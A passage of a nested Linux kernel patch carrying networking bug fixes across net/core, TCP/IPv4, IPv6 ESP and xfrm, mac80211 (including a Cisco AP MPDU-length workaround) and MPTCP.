+@@ -10930,7 +10955,9 @@ EXPORT_SYMBOL(unregister_netdev);
+ int __dev_change_net_namespace(struct net_device *dev, struct net *net,
+ 			       const char *pat, int new_ifindex)
+ {
++	struct netdev_name_node *name_node;
+ 	struct net *net_old = dev_net(dev);
++	char new_name[IFNAMSIZ] = {};
+ 	int err, new_nsid;
+ 
+ 	ASSERT_RTNL();
+@@ -10957,10 +10984,15 @@ int __dev_change_net_namespace(struct net_device *dev, struct net *net,
+ 		/* We get here if we can't use the current device name */
+ 		if (!pat)
+ 			goto out;
+-		err = dev_get_valid_name(net, dev, pat);
++		err = dev_prep_valid_name(net, dev, pat, new_name);
+ 		if (err < 0)
+ 			goto out;
+ 	}
++	/* Check that none of the altnames conflicts. */
++	err = -EEXIST;
++	netdev_for_each_altname(dev, name_node)
++		if (netdev_name_in_use(net, name_node->name))
++			goto out;
+ 
+ 	/* Check that new_ifindex isn't used yet. */
+ 	err = -EBUSY;
+@@ -11025,6 +11057,9 @@ int __dev_change_net_namespace(struct net_device *dev, struct net *net,
+ 	kobject_uevent(&dev->dev.kobj, KOBJ_ADD);
+ 	netdev_adjacent_add_links(dev);
+ 
++	if (new_name[0]) /* Rename the netdev to prepared name */
++		strscpy(dev->name, new_name, IFNAMSIZ);
++
+ 	/* Fixup kobjects */
+ 	err = device_rename(&dev->dev, dev->name);
+ 	WARN_ON(err);
+diff --git a/net/core/dev.h b/net/core/dev.h
+index cbb8a925175a2..9ca91457c197e 100644
+--- a/net/core/dev.h
++++ b/net/core/dev.h
+@@ -61,6 +61,9 @@ struct netdev_name_node {
+ int netdev_get_name(struct net *net, char *name, int ifindex);
+ int dev_change_name(struct net_device *dev, const char *newname);
+ 
++#define netdev_for_each_altname(dev, namenode)				\
++	list_for_each_entry((namenode), &(dev)->name_node->list, list)
++
+ int netdev_name_node_alt_create(struct net_device *dev, const char *name);
+ int netdev_name_node_alt_destroy(struct net_device *dev, const char *name);
+ 
+diff --git a/net/core/pktgen.c b/net/core/pktgen.c
+index c3763056c554a..471d4effa8b49 100644
+--- a/net/core/pktgen.c
++++ b/net/core/pktgen.c
+@@ -669,19 +669,19 @@ static int pktgen_if_show(struct seq_file *seq, void *v)
+ 	seq_puts(seq, "     Flags: ");
+ 
+ 	for (i = 0; i < NR_PKT_FLAGS; i++) {
+-		if (i == F_FLOW_SEQ)
++		if (i == FLOW_SEQ_SHIFT)
+ 			if (!pkt_dev->cflows)
+ 				continue;
+ 
+-		if (pkt_dev->flags & (1 << i))
++		if (pkt_dev->flags & (1 << i)) {
+ 			seq_printf(seq, "%s  ", pkt_flag_names[i]);
+-		else if (i == F_FLOW_SEQ)
+-			seq_puts(seq, "FLOW_RND  ");
+-
+ #ifdef CONFIG_XFRM
+-		if (i == F_IPSEC && pkt_dev->spi)
+-			seq_printf(seq, "spi:%u", pkt_dev->spi);
++			if (i == IPSEC_SHIFT && pkt_dev->spi)
++				seq_printf(seq, "spi:%u  ", pkt_dev->spi);
+ #endif
++		} else if (i == FLOW_SEQ_SHIFT) {
++			seq_puts(seq, "FLOW_RND  ");
++		}
+ 	}
+ 
+ 	seq_puts(seq, "\n");
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 9d4507aa736b7..854b3fd66b1be 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -5394,13 +5394,11 @@ static unsigned int
+ rtnl_offload_xstats_get_size_hw_s_info_one(const struct net_device *dev,
+ 					   enum netdev_offload_xstats_type type)
+ {
+-	bool enabled = netdev_offload_xstats_enabled(dev, type);
+-
+ 	return nla_total_size(0) +
+ 		/* IFLA_OFFLOAD_XSTATS_HW_S_INFO_REQUEST */
+ 		nla_total_size(sizeof(u8)) +
+ 		/* IFLA_OFFLOAD_XSTATS_HW_S_INFO_USED */
+-		(enabled ? nla_total_size(sizeof(u8)) : 0) +
++		nla_total_size(sizeof(u8)) +
+ 		0;
+ }
+ 
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 5b05b889d31af..051aa71a8ad0f 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -117,7 +117,7 @@ EXPORT_SYMBOL(sk_stream_wait_close);
+  */
+ int sk_stream_wait_memory(struct sock *sk, long *timeo_p)
+ {
+-	int err = 0;
++	int ret, err = 0;
+ 	long vm_wait = 0;
+ 	long current_timeo = *timeo_p;
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+@@ -142,11 +142,13 @@ int sk_stream_wait_memory(struct sock *sk, long *timeo_p)
+ 
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk->sk_write_pending++;
+-		sk_wait_event(sk, &current_timeo, READ_ONCE(sk->sk_err) ||
+-						  (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
+-						  (sk_stream_memory_free(sk) &&
+-						  !vm_wait), &wait);
++		ret = sk_wait_event(sk, &current_timeo, READ_ONCE(sk->sk_err) ||
++				    (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
++				    (sk_stream_memory_free(sk) && !vm_wait),
++				    &wait);
+ 		sk->sk_write_pending--;
++		if (ret < 0)
++			goto do_error;
+ 
+ 		if (vm_wait) {
+ 			vm_wait -= current_timeo;
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 04853c83c85c4..5d379df90c826 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -589,7 +589,6 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending += writebias;
+-	sk->sk_wait_pending++;
+ 
+ 	/* Basic assumption: if someone sets sk->sk_err, he _must_
+ 	 * change state of the socket from TCP_SYN_*.
+@@ -605,7 +604,6 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending -= writebias;
+-	sk->sk_wait_pending--;
+ 	return timeo;
+ }
+ 
+@@ -634,6 +632,7 @@ int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 			return -EINVAL;
+ 
+ 		if (uaddr->sa_family == AF_UNSPEC) {
++			sk->sk_disconnects++;
+ 			err = sk->sk_prot->disconnect(sk, flags);
+ 			sock->state = err ? SS_DISCONNECTING : SS_UNCONNECTED;
+ 			goto out;
+@@ -688,6 +687,7 @@ int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		int writebias = (sk->sk_protocol == IPPROTO_TCP) &&
+ 				tcp_sk(sk)->fastopen_req &&
+ 				tcp_sk(sk)->fastopen_req->data ? 1 : 0;
++		int dis = sk->sk_disconnects;
+ 
+ 		/* Error code is set above */
+ 		if (!timeo || !inet_wait_for_connect(sk, timeo, writebias))
+@@ -696,6 +696,11 @@ int __inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		err = sock_intr_errno(timeo);
+ 		if (signal_pending(current))
+ 			goto out;
++
++		if (dis != sk->sk_disconnects) {
++			err = -EPIPE;
++			goto out;
++		}
+ 	}
+ 
+ 	/* Connection was closed by RST, timeout, ICMP error
+@@ -717,6 +722,7 @@ out:
+ sock_error:
+ 	err = sock_error(sk) ? : -ECONNABORTED;
+ 	sock->state = SS_UNCONNECTED;
++	sk->sk_disconnects++;
+ 	if (sk->sk_prot->disconnect(sk, flags))
+ 		sock->state = SS_DISCONNECTING;
+ 	goto out;
+diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
+index 2d094d417ecae..e2546961add3e 100644
+--- a/net/ipv4/esp4.c
++++ b/net/ipv4/esp4.c
+@@ -732,7 +732,9 @@ static inline int esp_remove_trailer(struct sk_buff *skb)
+ 		skb->csum = csum_block_sub(skb->csum, csumdiff,
+ 					   skb->len - trimlen);
+ 	}
+-	pskb_trim(skb, skb->len - trimlen);
++	ret = pskb_trim(skb, skb->len - trimlen);
++	if (unlikely(ret))
++		return ret;
+ 
+ 	ret = nexthdr[1];
+ 
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index eafa4a0335157..5eb1b8d302bbd 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -1325,15 +1325,18 @@ __be32 fib_info_update_nhc_saddr(struct net *net, struct fib_nh_common *nhc,
+ 				 unsigned char scope)
+ {
+ 	struct fib_nh *nh;
++	__be32 saddr;
+ 
+ 	if (nhc->nhc_family != AF_INET)
+ 		return inet_select_addr(nhc->nhc_dev, 0, scope);
+ 
+ 	nh = container_of(nhc, struct fib_nh, nh_common);
+-	nh->nh_saddr = inet_select_addr(nh->fib_nh_dev, nh->fib_nh_gw4, scope);
+-	nh->nh_saddr_genid = atomic_read(&net->ipv4.dev_addr_genid);
++	saddr = inet_select_addr(nh->fib_nh_dev, nh->fib_nh_gw4, scope);
+ 
+-	return nh->nh_saddr;
++	WRITE_ONCE(nh->nh_saddr, saddr);
++	WRITE_ONCE(nh->nh_saddr_genid, atomic_read(&net->ipv4.dev_addr_genid));
++
++	return saddr;
+ }
+ 
+ __be32 fib_result_prefsrc(struct net *net, struct fib_result *res)
+@@ -1347,8 +1350,9 @@ __be32 fib_result_prefsrc(struct net *net, struct fib_result *res)
+ 		struct fib_nh *nh;
+ 
+ 		nh = container_of(nhc, struct fib_nh, nh_common);
+-		if (nh->nh_saddr_genid == atomic_read(&net->ipv4.dev_addr_genid))
+-			return nh->nh_saddr;
++		if (READ_ONCE(nh->nh_saddr_genid) ==
++		    atomic_read(&net->ipv4.dev_addr_genid))
++			return READ_ONCE(nh->nh_saddr);
+ 	}
+ 
+ 	return fib_info_update_nhc_saddr(net, nhc, res->fi->fib_scope);
+@@ -1887,6 +1891,7 @@ int fib_sync_down_addr(struct net_device *dev, __be32 local)
+ 			continue;
+ 		if (fi->fib_prefsrc == local) {
+ 			fi->fib_flags |= RTNH_F_DEAD;
++			fi->pfsrc_removed = true;
+ 			ret++;
+ 		}
+ 	}
+diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c
+index d13fb9e76b971..9bdfdab906fe0 100644
+--- a/net/ipv4/fib_trie.c
++++ b/net/ipv4/fib_trie.c
+@@ -2027,6 +2027,7 @@ void fib_table_flush_external(struct fib_table *tb)
+ int fib_table_flush(struct net *net, struct fib_table *tb, bool flush_all)
+ {
+ 	struct trie *t = (struct trie *)tb->tb_data;
++	struct nl_info info = { .nl_net = net };
+ 	struct key_vector *pn = t->kv;
+ 	unsigned long cindex = 1;
+ 	struct hlist_node *tmp;
+@@ -2089,6 +2090,9 @@ int fib_table_flush(struct net *net, struct fib_table *tb, bool flush_all)
+ 
+ 			fib_notify_alias_delete(net, n->key, &n->leaf, fa,
+ 						NULL);
++			if (fi->pfsrc_removed)
++				rtmsg_fib(RTM_DELROUTE, htonl(n->key), fa,
++					  KEYLENGTH - fa->fa_slen, tb->tb_id, &info, 0);
+ 			hlist_del_rcu(&fa->fa_list);
+ 			fib_release_info(fa->fa_info);
+ 			alias_free_mem_rcu(fa);
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 62a3b103f258a..80ce0112e24b4 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1143,7 +1143,6 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
+ 	if (newsk) {
+ 		struct inet_connection_sock *newicsk = inet_csk(newsk);
+ 
+-		newsk->sk_wait_pending = 0;
+ 		inet_sk_set_state(newsk, TCP_SYN_RECV);
+ 		newicsk->icsk_bind_hash = NULL;
+ 		newicsk->icsk_bind2_hash = NULL;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index d79de4b95186b..62d9472ac8bca 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -148,8 +148,14 @@ static bool inet_bind2_bucket_addr_match(const struct inet_bind2_bucket *tb2,
+ 					 const struct sock *sk)
+ {
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family != tb2->family)
+-		return false;
++	if (sk->sk_family != tb2->family) {
++		if (sk->sk_family == AF_INET)
++			return ipv6_addr_v4mapped(&tb2->v6_rcv_saddr) &&
++				tb2->v6_rcv_saddr.s6_addr32[3] == sk->sk_rcv_saddr;
++
++		return ipv6_addr_v4mapped(&sk->sk_v6_rcv_saddr) &&
++			sk->sk_v6_rcv_saddr.s6_addr32[3] == tb2->rcv_saddr;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+ 		return ipv6_addr_equal(&tb2->v6_rcv_saddr,
+@@ -799,19 +805,7 @@ static bool inet_bind2_bucket_match(const struct inet_bind2_bucket *tb,
+ 	    tb->l3mdev != l3mdev)
+ 		return false;
+ 
+-#if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family != tb->family) {
+-		if (sk->sk_family == AF_INET)
+-			return ipv6_addr_v4mapped(&tb->v6_rcv_saddr) &&
+-				tb->v6_rcv_saddr.s6_addr32[3] == sk->sk_rcv_saddr;
+-
+-		return false;
+-	}
+-
+-	if (sk->sk_family == AF_INET6)
+-		return ipv6_addr_equal(&tb->v6_rcv_saddr, &sk->sk_v6_rcv_saddr);
+-#endif
+-	return tb->rcv_saddr == sk->sk_rcv_saddr;
++	return inet_bind2_bucket_addr_match(tb, sk);
+ }
+ 
+ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const struct net *net,
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 96fdde6e42b1b..288678f17ccaf 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -827,7 +827,9 @@ ssize_t tcp_splice_read(struct socket *sock, loff_t *ppos,
+ 			 */
+ 			if (!skb_queue_empty(&sk->sk_receive_queue))
+ 				break;
+-			sk_wait_data(sk, &timeo, NULL);
++			ret = sk_wait_data(sk, &timeo, NULL);
++			if (ret < 0)
++				break;
+ 			if (signal_pending(current)) {
+ 				ret = sock_intr_errno(timeo);
+ 				break;
+@@ -2549,7 +2551,11 @@ static int tcp_recvmsg_locked(struct sock *sk, struct msghdr *msg, size_t len,
+ 			__sk_flush_backlog(sk);
+ 		} else {
+ 			tcp_cleanup_rbuf(sk, copied);
+-			sk_wait_data(sk, &timeo, last);
++			err = sk_wait_data(sk, &timeo, last);
++			if (err < 0) {
++				err = copied ? : err;
++				goto out;
++			}
+ 		}
+ 
+ 		if ((flags & MSG_PEEK) &&
+@@ -3073,12 +3079,6 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	int old_state = sk->sk_state;
+ 	u32 seq;
+ 
+-	/* Deny disconnect if other threads are blocked in sk_wait_event()
+-	 * or inet_wait_for_connect().
+-	 */
+-	if (sk->sk_wait_pending)
+-		return -EBUSY;
+-
+ 	if (old_state != TCP_CLOSE)
+ 		tcp_set_state(sk, TCP_CLOSE);
+ 
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index f53380fd89bcf..f8037d142bb75 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -302,6 +302,10 @@ msg_bytes_ready:
+ 		}
+ 
+ 		data = tcp_msg_wait_data(sk, psock, timeo);
++		if (data < 0) {
++			copied = data;
++			goto unlock;
++		}
+ 		if (data && !sk_psock_queue_empty(psock))
+ 			goto msg_bytes_ready;
+ 		copied = -EAGAIN;
+@@ -312,6 +316,8 @@ out:
+ 	tcp_rcv_space_adjust(sk);
+ 	if (copied > 0)
+ 		__tcp_cleanup_rbuf(sk, copied);
++
++unlock:
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+ 	return copied;
+@@ -346,6 +352,10 @@ msg_bytes_ready:
+ 
+ 		timeo = sock_rcvtimeo(sk, flags & MSG_DONTWAIT);
+ 		data = tcp_msg_wait_data(sk, psock, timeo);
++		if (data < 0) {
++			ret = data;
++			goto unlock;
++		}
+ 		if (data) {
+ 			if (!sk_psock_queue_empty(psock))
+ 				goto msg_bytes_ready;
+@@ -356,6 +366,8 @@ msg_bytes_ready:
+ 		copied = -EAGAIN;
+ 	}
+ 	ret = copied;
++
++unlock:
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+ 	return ret;
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 5df19f93f86ab..7ebbbe561e402 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -1818,6 +1818,7 @@ bool tcp_add_backlog(struct sock *sk, struct sk_buff *skb,
+ #ifdef CONFIG_TLS_DEVICE
+ 	    tail->decrypted != skb->decrypted ||
+ #endif
++	    !mptcp_skb_can_collapse(tail, skb) ||
+ 	    thtail->doff != th->doff ||
+ 	    memcmp(thtail + 1, th + 1, hdrlen - sizeof(*th)))
+ 		goto no_coalesce;
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 443b1cab25299..cc7ed86fb0a57 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -2489,6 +2489,18 @@ static bool tcp_pacing_check(struct sock *sk)
+ 	return true;
+ }
+ 
++static bool tcp_rtx_queue_empty_or_single_skb(const struct sock *sk)
++{
++	const struct rb_node *node = sk->tcp_rtx_queue.rb_node;
++
++	/* No skb in the rtx queue. */
++	if (!node)
++		return true;
++
++	/* Only one skb in rtx queue. */
++	return !node->rb_left && !node->rb_right;
++}
++
+ /* TCP Small Queues :
+  * Control number of packets in qdisc/devices to two packets / or ~1 ms.
+  * (These limits are doubled for retransmits)
+@@ -2526,12 +2538,12 @@ static bool tcp_small_queue_check(struct sock *sk, const struct sk_buff *skb,
+ 		limit += extra_bytes;
+ 	}
+ 	if (refcount_read(&sk->sk_wmem_alloc) > limit) {
+-		/* Always send skb if rtx queue is empty.
++		/* Always send skb if rtx queue is empty or has one skb.
+ 		 * No need to wait for TX completion to call us back,
+ 		 * after softirq/tasklet schedule.
+ 		 * This helps when TX completions are delayed too much.
+ 		 */
+-		if (tcp_rtx_queue_empty(sk))
++		if (tcp_rtx_queue_empty_or_single_skb(sk))
+ 			return false;
+ 
+ 		set_bit(TSQ_THROTTLED, &sk->sk_tsq_flags);
+@@ -2735,7 +2747,7 @@ bool tcp_schedule_loss_probe(struct sock *sk, bool advancing_rto)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
+-	u32 timeout, rto_delta_us;
++	u32 timeout, timeout_us, rto_delta_us;
+ 	int early_retrans;
+ 
+ 	/* Don't do any loss probe on a Fast Open connection before 3WHS
+@@ -2759,11 +2771,12 @@ bool tcp_schedule_loss_probe(struct sock *sk, bool advancing_rto)
+ 	 * sample is available then probe after TCP_TIMEOUT_INIT.
+ 	 */
+ 	if (tp->srtt_us) {
+-		timeout = usecs_to_jiffies(tp->srtt_us >> 2);
++		timeout_us = tp->srtt_us >> 2;
+ 		if (tp->packets_out == 1)
+-			timeout += TCP_RTO_MIN;
++			timeout_us += tcp_rto_min_us(sk);
+ 		else
+-			timeout += TCP_TIMEOUT_MIN;
++			timeout_us += TCP_TIMEOUT_MIN_US;
++		timeout = usecs_to_jiffies(timeout_us);
+ 	} else {
+ 		timeout = TCP_TIMEOUT_INIT;
+ 	}
+diff --git a/net/ipv4/tcp_recovery.c b/net/ipv4/tcp_recovery.c
+index 50abaa941387d..c085793691102 100644
+--- a/net/ipv4/tcp_recovery.c
++++ b/net/ipv4/tcp_recovery.c
+@@ -104,7 +104,7 @@ bool tcp_rack_mark_lost(struct sock *sk)
+ 	tp->rack.advanced = 0;
+ 	tcp_rack_detect_loss(sk, &timeout);
+ 	if (timeout) {
+-		timeout = usecs_to_jiffies(timeout) + TCP_TIMEOUT_MIN;
++		timeout = usecs_to_jiffies(timeout + TCP_TIMEOUT_MIN_US);
+ 		inet_csk_reset_xmit_timer(sk, ICSK_TIME_REO_TIMEOUT,
+ 					  timeout, inet_csk(sk)->icsk_rto);
+ 	}
+diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
+index 14ed868680c6a..c2dcb5c613b6b 100644
+--- a/net/ipv6/esp6.c
++++ b/net/ipv6/esp6.c
+@@ -770,7 +770,9 @@ static inline int esp_remove_trailer(struct sk_buff *skb)
+ 		skb->csum = csum_block_sub(skb->csum, csumdiff,
+ 					   skb->len - trimlen);
+ 	}
+-	pskb_trim(skb, skb->len - trimlen);
++	ret = pskb_trim(skb, skb->len - trimlen);
++	if (unlikely(ret))
++		return ret;
+ 
+ 	ret = nexthdr[1];
+ 
+diff --git a/net/ipv6/xfrm6_policy.c b/net/ipv6/xfrm6_policy.c
+index ea435eba30534..f0053087d2e47 100644
+--- a/net/ipv6/xfrm6_policy.c
++++ b/net/ipv6/xfrm6_policy.c
+@@ -118,11 +118,11 @@ static void xfrm6_dst_destroy(struct dst_entry *dst)
+ {
+ 	struct xfrm_dst *xdst = (struct xfrm_dst *)dst;
+ 
+-	if (likely(xdst->u.rt6.rt6i_idev))
+-		in6_dev_put(xdst->u.rt6.rt6i_idev);
+ 	dst_destroy_metrics_generic(dst);
+ 	if (xdst->u.rt6.rt6i_uncached_list)
+ 		rt6_uncached_list_del(&xdst->u.rt6);
++	if (likely(xdst->u.rt6.rt6i_idev))
++		in6_dev_put(xdst->u.rt6.rt6i_idev);
+ 	xfrm_dst_destroy(xdst);
+ }
+ 
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 0167413d56972..ee9f455bb2d18 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1748,7 +1748,8 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 	/* VHT can override some HT caps such as the A-MSDU max length */
+ 	if (params->vht_capa)
+ 		ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+-						    params->vht_capa, link_sta);
++						    params->vht_capa, NULL,
++						    link_sta);
+ 
+ 	if (params->he_capa)
+ 		ieee80211_he_cap_ie_to_sta_he_cap(sdata, sband,
+diff --git a/net/mac80211/ibss.c b/net/mac80211/ibss.c
+index 9dffc30795887..79d2c55052897 100644
+--- a/net/mac80211/ibss.c
++++ b/net/mac80211/ibss.c
+@@ -1068,7 +1068,7 @@ static void ieee80211_update_sta_info(struct ieee80211_sub_if_data *sdata,
+ 						   &chandef);
+ 			memcpy(&cap_ie, elems->vht_cap_elem, sizeof(cap_ie));
+ 			ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+-							    &cap_ie,
++							    &cap_ie, NULL,
+ 							    &sta->deflink);
+ 			if (memcmp(&cap, &sta->sta.deflink.vht_cap, sizeof(cap)))
+ 				rates_updated |= true;
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 27479bbb093ac..99a976ea17498 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -2062,6 +2062,7 @@ void
+ ieee80211_vht_cap_ie_to_sta_vht_cap(struct ieee80211_sub_if_data *sdata,
+ 				    struct ieee80211_supported_band *sband,
+ 				    const struct ieee80211_vht_cap *vht_cap_ie,
++				    const struct ieee80211_vht_cap *vht_cap_ie2,
+ 				    struct link_sta_info *link_sta);
+ enum ieee80211_sta_rx_bandwidth
+ ieee80211_sta_cap_rx_bw(struct link_sta_info *link_sta);
+diff --git a/net/mac80211/mesh_plink.c b/net/mac80211/mesh_plink.c
+index ddfe5102b9a43..bd0b7c189adfa 100644
+--- a/net/mac80211/mesh_plink.c
++++ b/net/mac80211/mesh_plink.c
+@@ -443,7 +443,7 @@ static void mesh_sta_info_init(struct ieee80211_sub_if_data *sdata,
+ 		changed |= IEEE80211_RC_BW_CHANGED;
+ 
+ 	ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+-					    elems->vht_cap_elem,
++					    elems->vht_cap_elem, NULL,
+ 					    &sta->deflink);
+ 
+ 	ieee80211_he_cap_ie_to_sta_he_cap(sdata, sband, elems->he_cap,
+diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c
+index dc9e7eb7dd857..c07645c999f9a 100644
+--- a/net/mac80211/mlme.c
++++ b/net/mac80211/mlme.c
+@@ -4083,10 +4083,33 @@ static bool ieee80211_assoc_config_link(struct ieee80211_link_data *link,
+ 						  elems->ht_cap_elem,
+ 						  link_sta);
+ 
+-	if (elems->vht_cap_elem && !(link->u.mgd.conn_flags & IEEE80211_CONN_DISABLE_VHT))
++	if (elems->vht_cap_elem &&
++	    !(link->u.mgd.conn_flags & IEEE80211_CONN_DISABLE_VHT)) {
++		const struct ieee80211_vht_cap *bss_vht_cap = NULL;
++		const struct cfg80211_bss_ies *ies;
++
++		/*
++		 * Cisco AP module 9115 with FW 17.3 has a bug and sends a
++		 * too large maximum MPDU length in the association response
++		 * (indicating 12k) that it cannot actually process ...
++		 * Work around that.
++		 */
++		rcu_read_lock();
++		ies = rcu_dereference(cbss->ies);
++		if (ies) {
++			const struct element *elem;
++
++			elem = cfg80211_find_elem(WLAN_EID_VHT_CAPABILITY,
++						  ies->data, ies->len);
++			if (elem && elem->datalen >= sizeof(*bss_vht_cap))
++				bss_vht_cap = (const void *)elem->data;
++		}
++
+ 		ieee80211_vht_cap_ie_to_sta_vht_cap(sdata, sband,
+ 						    elems->vht_cap_elem,
+-						    link_sta);
++						    bss_vht_cap, link_sta);
++		rcu_read_unlock();
++	}
+ 
+ 	if (elems->he_operation && !(link->u.mgd.conn_flags & IEEE80211_CONN_DISABLE_HE) &&
+ 	    elems->he_cap) {
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 2f9e1abdf375d..2db103a56a28f 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -680,7 +680,8 @@ ieee80211_tx_h_select_key(struct ieee80211_tx_data *tx)
+ 		}
+ 
+ 		if (unlikely(tx->key && tx->key->flags & KEY_FLAG_TAINTED &&
+-			     !ieee80211_is_deauth(hdr->frame_control)))
++			     !ieee80211_is_deauth(hdr->frame_control)) &&
++			     tx->skb->protocol != tx->sdata->control_port_protocol)
+ 			return TX_DROP;
+ 
+ 		if (!skip_hw && tx->key &&
+diff --git a/net/mac80211/vht.c b/net/mac80211/vht.c
+index 803de58814852..f7526be8a1c7e 100644
+--- a/net/mac80211/vht.c
++++ b/net/mac80211/vht.c
+@@ -4,7 +4,7 @@
+  *
+  * Portions of this file
+  * Copyright(c) 2015 - 2016 Intel Deutschland GmbH
+- * Copyright (C) 2018 - 2022 Intel Corporation
++ * Copyright (C) 2018 - 2023 Intel Corporation
+  */
+ 
+ #include <linux/ieee80211.h>
+@@ -116,12 +116,14 @@ void
+ ieee80211_vht_cap_ie_to_sta_vht_cap(struct ieee80211_sub_if_data *sdata,
+ 				    struct ieee80211_supported_band *sband,
+ 				    const struct ieee80211_vht_cap *vht_cap_ie,
++				    const struct ieee80211_vht_cap *vht_cap_ie2,
+ 				    struct link_sta_info *link_sta)
+ {
+ 	struct ieee80211_sta_vht_cap *vht_cap = &link_sta->pub->vht_cap;
+ 	struct ieee80211_sta_vht_cap own_cap;
+ 	u32 cap_info, i;
+ 	bool have_80mhz;
++	u32 mpdu_len;
+ 
+ 	memset(vht_cap, 0, sizeof(*vht_cap));
+ 
+@@ -317,11 +319,21 @@ ieee80211_vht_cap_ie_to_sta_vht_cap(struct ieee80211_sub_if_data *sdata,
+ 
+ 	link_sta->pub->bandwidth = ieee80211_sta_cur_vht_bw(link_sta);
+ 
++	/*
++	 * Work around the Cisco 9115 FW 17.3 bug by taking the min of
++	 * both reported MPDU lengths.
++	 */
++	mpdu_len = vht_cap->cap & IEEE80211_VHT_CAP_MAX_MPDU_MASK;
++	if (vht_cap_ie2)
++		mpdu_len = min_t(u32, mpdu_len,
++				 le32_get_bits(vht_cap_ie2->vht_cap_info,
++					       IEEE80211_VHT_CAP_MAX_MPDU_MASK));
++
+ 	/*
+ 	 * FIXME - should the amsdu len be per link? store per link
+ 	 * and maintain a minimum?
+ 	 */
+-	switch (vht_cap->cap & IEEE80211_VHT_CAP_MAX_MPDU_MASK) {
++	switch (mpdu_len) {
+ 	case IEEE80211_VHT_CAP_MAX_MPDU_LENGTH_11454:
+ 		link_sta->pub->agg.max_amsdu_len = IEEE80211_MAX_MPDU_LEN_VHT_11454;
+ 		break;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 881e05193ac97..0eb20274459c8 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1342,7 +1342,7 @@ alloc_skb:
+ 	if (copy == 0) {
+ 		u64 snd_una = READ_ONCE(msk->snd_una);
+ 
+-		if (snd_una != msk->snd_nxt) {
++		if (snd_una != msk->snd_nxt || tcp_write_queue_tail(ssk)) {
+ 			tcp_remove_empty_skb(ssk);
+ 			return 0;
+ 		}
+@@ -1350,11 +1350,6 @@ alloc_skb:
+ 		zero_window_probe = true;
+ 		data_seq = snd_una - 1;
+ 		copy = 1;
+-
+-		/* all mptcp-level data is acked, no skbs should be present into the
+-		 * ssk write queue
+-		 */
+-		WARN_ON_ONCE(reuse_skb);
+ 	}
+ 
+ 	copy = min_t(size_t, copy, info->limit - info->sent);
+@@ -1383,7 +1378,6 @@ alloc_skb:
+ 	if (reuse_skb) {
+ 		TCP_SKB_CB(skb)->tcp_flags &= ~TCPHDR_PSH;
+ 		mpext->data_len += copy;
+-		WARN_ON_ONCE(zero_window_probe);
+ 		goto out;
+ 	}
+ 
